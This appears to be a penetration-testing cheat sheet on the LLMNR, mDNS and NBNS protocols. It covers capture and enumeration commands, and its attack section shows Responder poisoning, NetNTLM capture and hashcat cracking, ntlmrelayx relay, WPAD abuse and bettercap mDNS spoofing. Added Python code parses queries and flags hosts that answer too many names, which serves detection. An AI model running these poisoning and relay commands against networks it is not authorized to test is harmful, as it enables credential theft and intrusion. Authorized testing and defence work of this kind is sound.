LLMNR, mDNS and NBNS
Default Ports: 5355/UDP (LLMNR), 5353/UDP (mDNS), 137/UDP (NBNS)
LLMNR, mDNS, and NBNS are local name resolution protocols used when DNS does not answer. In internal pentests, they are common paths for name poisoning, NTLM capture, relay setup, and local service discovery.
Connect
Packet Capture
Start passively to see which names clients request.
sudo tcpdump -ni eth0 'udp port 5355 or udp port 5353 or udp port 137'
sudo tcpdump -ni eth0 -w name-resolution.pcap 'udp port 5355 or udp port 5353 or udp port 137'
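LLMNR, mDNS and NBNS all reuse the DNS message layout (12-byte header, then a question section), which is why one tshark filter covers all three and why a captured datagram is easy to decode by hand. The following Python is an added example, not code from this page or from any of the tools it lists: it parses the first question of an LLMNR, mDNS or NBNS query, infers the protocol from the destination port, and undoes the NBNS first-level name encoding (each byte split into two nibbles, each nibble plus 'A'). The three sample datagrams (fileserv01, _http._tcp.local, WPAD<00>) are constructed inline rather than taken from a real capture.

```python
from __future__ import annotations

import struct
from dataclasses import dataclass
from typing import Optional

# Ports from the page; the protocol of a UDP payload is inferred from the port it arrived on.
PORT_TO_PROTOCOL = {5355: "LLMNR", 5353: "mDNS", 137: "NBNS"}


@dataclass
class NameQuery:
    protocol: str
    name: str                     # queried name (NetBIOS name for NBNS, dotted name otherwise)
    qtype: int                    # DNS-style query type (1 = A, 12 = PTR, 0x20 = NB for NBNS)
    unicast_response: bool        # mDNS "QU" bit: top bit of QCLASS set
    suffix: Optional[int] = None  # NBNS 16th byte: 0x00 workstation, 0x20 file server, 0x1C domain controllers


def encode_netbios_name(name: str, suffix: int) -> bytes:
    """NBNS first-level encoding: pad to 15 chars, append the suffix byte, emit two 'A'-based nibbles per byte."""
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    return bytes(b for byte in raw for b in ((byte >> 4) + 0x41, (byte & 0x0F) + 0x41))


def decode_netbios_label(label: bytes) -> tuple[str, int]:
    """Reverse of encode_netbios_name: returns (name without padding, suffix byte)."""
    if len(label) != 32:
        raise ValueError("NetBIOS first-level label must be 32 characters")
    raw = bytes(((label[i] - 0x41) << 4) | (label[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii", "replace").rstrip(" "), raw[15]


def _read_name(payload: bytes, offset: int) -> tuple[list, int]:
    """Read DNS-style labels; client queries carry no compression pointers, so treat one as malformed."""
    labels = []
    while True:
        length = payload[offset]
        offset += 1
        if length == 0:
            return labels, offset
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(payload[offset:offset + length])
        offset += length


def parse_name_query(port: int, payload: bytes) -> NameQuery:
    """Parse the first question of an LLMNR/mDNS/NBNS query datagram (all three share the DNS header layout)."""
    protocol = PORT_TO_PROTOCOL[port]
    if len(payload) < 12:
        raise ValueError("truncated header")
    _tid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    if flags & 0x8000:
        raise ValueError("datagram is a response, not a query")
    if qdcount == 0:
        raise ValueError("no question section")
    labels, offset = _read_name(payload, 12)
    qtype, qclass = struct.unpack("!HH", payload[offset:offset + 4])
    if protocol == "NBNS":
        name, suffix = decode_netbios_label(labels[0])
        return NameQuery(protocol, name, qtype, False, suffix)
    name = ".".join(label.decode("ascii", "replace") for label in labels)
    return NameQuery(protocol, name, qtype, bool(qclass & 0x8000) if protocol == "mDNS" else False)


def is_wpad_lookup(query: NameQuery) -> bool:
    """A WPAD lookup that fell through to multicast is the one a defender most wants to alert on."""
    lowered = query.name.lower()
    return lowered == "wpad" or lowered.startswith("wpad.")


# Constructed sample datagrams (not captured traffic): ID 0x1234, flags 0 (standard query), QDCOUNT 1, rest 0.
_HEADER = struct.pack("!HHHHHH", 0x1234, 0, 1, 0, 0, 0)
LLMNR_SAMPLE = _HEADER + b"\x0afileserv01\x00" + struct.pack("!HH", 1, 1)                    # A? fileserv01
MDNS_SAMPLE = _HEADER + b"\x05_http\x04_tcp\x05local\x00" + struct.pack("!HH", 12, 0x8001)   # PTR? _http._tcp.local (QU)
NBNS_SAMPLE = _HEADER + b"\x20" + encode_netbios_name("WPAD", 0x00) + b"\x00" + struct.pack("!HH", 0x20, 1)  # NB? WPAD<00>

if __name__ == "__main__":
    for port, packet in ((5355, LLMNR_SAMPLE), (5353, MDNS_SAMPLE), (137, NBNS_SAMPLE)):
        q = parse_name_query(port, packet)
        print(f"{q.protocol:5} {q.name!r:22} qtype={q.qtype:#06x} suffix={q.suffix} wpad={is_wpad_lookup(q)}")
```

To use it on a real capture, feed each UDP payload from the pcap (for example via a pcap reader) together with its destination port; responses raise rather than parse, since the point here is to see what clients are asking for.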
Using Responder
Responder listens for name resolution requests and can answer them during authorized tests.
sudo responder -I eth0 -A
sudo responder -I eth0
Using avahi-browse
avahi-browse enumerates mDNS services on the local network.
avahi-browse -a
avahi-browse -art
Using nbtscan
nbtscan enumerates NetBIOS names and workgroups.
nbtscan 192.168.1.0/24
nbtscan -v 192.168.1.0/24
Recon
Protocol Discovery
Check whether hosts are sending local name resolution traffic.
sudo tcpdump -ni eth0 -vv 'udp port 5355 or udp port 5353 or udp port 137'
sudo tshark -i eth0 -Y 'llmnr or mdns or nbns'
Host and Name Discovery
Captured names reveal hostnames, services, shares, printers, and mistyped DNS names.
sudo responder -I eth0 -A
sudo tshark -r name-resolution.pcap -Y 'llmnr or mdns or nbns' -T fields -e ip.src -e dns.qry.name
mDNS Service Enumeration
mDNS exposes local services such as printers, AirPlay, SSH, HTTP, and IoT endpoints.
avahi-browse -art
dns-sd -B _services._dns-sd._udp local
Enumeration
LLMNR Enumeration
LLMNR requests often show Windows hosts failing DNS lookups.
sudo tcpdump -ni eth0 'udp port 5355'
sudo tshark -i eth0 -Y llmnr -T fields -e ip.src -e dns.qry.name
NBNS Enumeration
NBNS reveals NetBIOS names, domains, and legacy Windows naming.
nbtscan 192.168.1.0/24
nmap -sU -p 137 --script nbstat 192.168.1.0/24
mDNS Enumeration
mDNS enumeration maps local service advertisements.
avahi-browse -a
avahi-browse -rt _http._tcp
avahi-browse -rt _ssh._tcp
Attack Vectors
Name Poisoning
Poisoning can redirect clients to attacker-controlled services.
sudo responder -I eth0
sudo responder -I eth0 -rdw
NTLM Capture
Responder can capture NetNTLM hashes from poisoned SMB/HTTP authentication.
sudo responder -I eth0 -w -F
hashcat -m 5600 hashes.txt wordlist.txt
NTLM Relay
Captured authentication can sometimes be relayed to SMB, LDAP, or HTTP targets.
sudo responder -I eth0 --disable-ess
ntlmrelayx.py -tf targets.txt -smb2support
WPAD Abuse
WPAD names are especially valuable because clients may send proxy credentials.
sudo responder -I eth0 -w -F
ntlmrelayx.py -tf targets.txt --http-port 80
mDNS Spoofing
mDNS spoofing can impersonate local services in weakly segmented networks.
sudo bettercap -iface eth0
set mdns.spoofing true
mdns.spoof on
Post-Exploitation
Host Mapping
Use captured names to enrich internal host and service maps.
sudo tshark -r name-resolution.pcap -Y 'llmnr or mdns or nbns' -T fields -e ip.src -e dns.qry.name | sort -u
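The tshark field export in the Host and Name Discovery and Host Mapping sections is easy to post-process. The Python below is an added example, not code from this page or from any tool it lists. It assumes the capture was exported with `-e ip.src -e ip.dst -e dns.flags.response -e dns.qry.name` (tab-separated, the tshark default for `-T fields`); the sample lines are constructed, not real traffic. It builds the per-host list of requested names, lists names nobody answered (typically typos or stale references worth fixing in DNS), and flags any single host that answers many unrelated names on the segment, which is the behaviour a name-poisoning tool produces and a useful detection rule for blue teams reviewing the same capture.

```python
from __future__ import annotations

from collections import defaultdict
from typing import NamedTuple


class Record(NamedTuple):
    src: str
    dst: str
    is_response: bool
    name: str


def parse_field_lines(text: str) -> list[Record]:
    """Parse tab-separated tshark -T fields output: ip.src, ip.dst, dns.flags.response, dns.qry.name.
    dns.flags.response prints as 1/0 on older tshark builds and True/False on newer ones; accept both."""
    records = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 4 or not parts[3]:
            continue  # blank lines or frames without a question name
        src, dst, flag, name = parts
        records.append(Record(src, dst, flag in ("1", "True"), name.lower().rstrip(".")))
    return records


def build_host_map(records: list[Record]) -> dict[str, list[str]]:
    """Which names each client asked for: the enrichment step described under Host Mapping."""
    host_map = defaultdict(set)
    for r in records:
        if not r.is_response:
            host_map[r.src].add(r.name)
    return {host: sorted(names) for host, names in host_map.items()}


def find_suspect_responders(records: list[Record], min_distinct_names: int = 3) -> dict[str, list[str]]:
    """One host answering many unrelated names is the signature of a poisoner that answers everything."""
    answered = defaultdict(set)
    for r in records:
        if r.is_response:
            answered[r.src].add(r.name)
    return {host: sorted(names) for host, names in answered.items() if len(names) >= min_distinct_names}


def unanswered_names(records: list[Record]) -> list[str]:
    """Names that were asked for but never answered by anyone."""
    asked = {r.name for r in records if not r.is_response}
    answered = {r.name for r in records if r.is_response}
    return sorted(asked - answered)


# Constructed sample export (not real traffic). 224.0.0.252 is the LLMNR multicast group;
# 10.0.0.99 answers every name it sees, 10.0.0.5 answers a single name.
SAMPLE_FIELDS = """\
10.0.0.15\t224.0.0.252\t0\tfileserv01
10.0.0.15\t224.0.0.252\t0\tfileserv01
10.0.0.22\t224.0.0.252\t0\twpad
10.0.0.22\t224.0.0.252\t0\tprintsrv
10.0.0.31\t224.0.0.252\t0\tintranet
10.0.0.31\t224.0.0.252\t0\tfileshare
10.0.0.99\t10.0.0.15\t1\tfileserv01
10.0.0.99\t10.0.0.22\t1\twpad
10.0.0.99\t10.0.0.22\t1\tprintsrv
10.0.0.99\t10.0.0.31\t1\tintranet
10.0.0.5\t10.0.0.31\t1\tintranet
"""

if __name__ == "__main__":
    recs = parse_field_lines(SAMPLE_FIELDS)
    print("host map:", build_host_map(recs))
    print("unanswered:", unanswered_names(recs))
    print("suspect responders:", find_suspect_responders(recs))
```

On a real export the threshold should be tuned to the segment: a legitimate host answers only its own name (and, for a domain controller, a handful of service names), so a responder with several distinct unrelated names is worth investigating.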
Credential Handling
Cracked or relayed credentials should be scoped and validated carefully.
hashcat -m 5600 hashes.txt wordlist.txt
netexec smb targets.txt -u user -p password
Useful Tools
| Tool | Purpose |
|---|---|
| Responder | Poisoning and capture |
| ntlmrelayx.py | NTLM relay |
| tcpdump | Passive capture |
| tshark | Packet parsing |
| nbtscan | NetBIOS enumeration |
| avahi-browse | mDNS enumeration |
| bettercap | Local network spoofing |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| LLMNR enabled | Name poisoning and NTLM capture |
| NBNS enabled | Legacy poisoning and host leakage |
| WPAD fallback enabled | Proxy credential capture |
| SMB signing disabled | NTLM relay |
| mDNS exposed broadly | Local service discovery |
| Weak network segmentation | Poisoning across user groups |